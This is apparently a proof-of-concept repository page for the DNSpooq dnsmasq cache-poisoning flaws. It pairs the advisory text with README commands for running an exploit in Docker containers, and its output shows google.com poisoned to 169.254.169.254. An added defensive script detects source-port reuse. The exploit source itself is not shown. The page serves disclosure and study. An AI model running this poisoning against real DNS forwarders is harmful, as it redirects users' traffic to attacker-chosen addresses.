
CVE-2020-25686 PoC — Dnsmasq security feature issue vulnerability

Source
Associated Vulnerability
Title: Dnsmasq security feature issue vulnerability (CVE-2020-25686)
Description: Dnsmasq is a lightweight DNS forwarder and DHCP/TFTP server written in C. Dnsmasq has a security feature issue vulnerability: it does not check for an existing pending request with the same name before forwarding a new one, which allows an attacker to carry out a "birthday attack" scenario to forge replies and potentially poison the DNS cache.
Description
DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)
Readme
# dnspooq
DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

For educational purposes only



## Requirements
- Docker compose
- Docker

## Exploit

![dnspooq](imgs/dnspooq.png)

### Launch containers

```
$ docker-compose up -d
```

### Run exploit.py

```
$ docker-compose exec attacker bash
bash-5.0# python exploit.py
Querying non-cached names...
Generating spoofed packets...
Poisoned: b'google.com.' => 169.254.169.254
sent 3032017 responses in 50.309 seconds
```

### View output from forwarder container

```
$ docker-compose logs -f forwarder
...
forwarder_1  | dnsmasq[1]: query[A] example.com from 10.10.0.3
forwarder_1  | dnsmasq[1]: forwarded example.com to 10.10.0.4
forwarder_1  | dnsmasq[1]: cached example.com is <CNAME>
forwarder_1  | dnsmasq[1]: cached google.com is 169.254.169.254
```

### View output from cache container

```
$ docker-compose logs -f cache
Attaching to dnspooq_cache_1
cache_1      | Sniffing...
cache_1      | Source port: 46816, TXID: 16476, Query: b'example.com.'
cache_1      | Source port: 16718, TXID: 54280, Query: b'example.com.'
...
cache_1      | Source port: 46816, TXID: 56240, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 24160, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 18189, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 40361, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 13100, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 47303, Query: b'example.com.'
```
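The repeated source port in the cache container output above is the signal a defender can look for: when the forwarder keeps one port across many in-flight queries for the same name, only the 16-bit TXID separates them. The checker below is an added example, not part of this repository; it parses lines in the format sniff.py prints and flags names whose outstanding upstream queries reuse a source port. The sample lines (built from the README's output) and the reuse threshold are assumptions of this example.

```python
import re
from collections import Counter, defaultdict

# Line format printed by the cache container's sniffer in the README above.
LINE_RE = re.compile(
    r"Source port: (?P<port>\d+), TXID: (?P<txid>\d+), Query: b'(?P<name>[^']*)'")

# Constructed from the README's cache-container output for this example.
SAMPLE_LOG = """\
cache_1      | Sniffing...
cache_1      | Source port: 46816, TXID: 16476, Query: b'example.com.'
cache_1      | Source port: 16718, TXID: 54280, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 56240, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 24160, Query: b'example.com.'
"""

def parse_queries(log_text):
    """Return (port, txid, name) for every line matching the sniffer format."""
    out = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            out.append((int(m["port"]), int(m["txid"]), m["name"]))
    return out

def port_reuse_report(queries, max_reuse=1):
    """Group forwarded queries by name and flag names whose in-flight upstream
    queries reuse one source port more than max_reuse times (assumed threshold).
    With the port fixed, several outstanding queries for one name
    (CVE-2020-25686) leave only the TXID to guess, so a birthday-style
    collision becomes likely; repeated ports are the observable signal."""
    by_name = defaultdict(list)
    for port, txid, name in queries:
        by_name[name].append((port, txid))
    report = {}
    for name, pairs in by_name.items():
        top_port, reuse = Counter(p for p, _ in pairs).most_common(1)[0]
        report[name] = {
            "in_flight": len(pairs),
            "distinct_ports": len({p for p, _ in pairs}),
            "distinct_txids": len({t for _, t in pairs}),
            "top_port": top_port,
            "top_port_reuse": reuse,
            "suspicious": reuse > max_reuse,
        }
    return report

if __name__ == "__main__":
    for name, r in port_reuse_report(parse_queries(SAMPLE_LOG)).items():
        print(name, "SUSPICIOUS" if r["suspicious"] else "ok", r)
```

A forwarder that randomizes the source port per query yields distinct_ports equal to in_flight and no suspicious entries, which is the behaviour a patched build should show in the same log.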

## References
- https://www.jsof-tech.com/disclosures/dnspooq/
- https://www.jsof-tech.com/wp-content/uploads/2021/01/DNSpooq-Technical-WP.pdf

## Author
Teppei Fukuda
File Snapshot

```
[4.0K] /data/pocs/3e91595690b44c8e218151ab79790a27ef70c616
├── [4.0K] attacker
│   ├── [ 118] Dockerfile
│   └── [2.3K] exploit.py
├── [4.0K] cache
│   ├── [ 126] Dockerfile
│   └── [ 308] sniff.py
├── [4.0K] dnsmasq
│   ├── [  41] dnsmasq.conf
│   └── [ 522] Dockerfile
├── [ 677] docker-compose.yml
├── [4.0K] imgs
│   └── [236K] dnspooq.png
├── [ 11K] LICENSE
└── [1.7K] README.md

4 directories, 10 files
```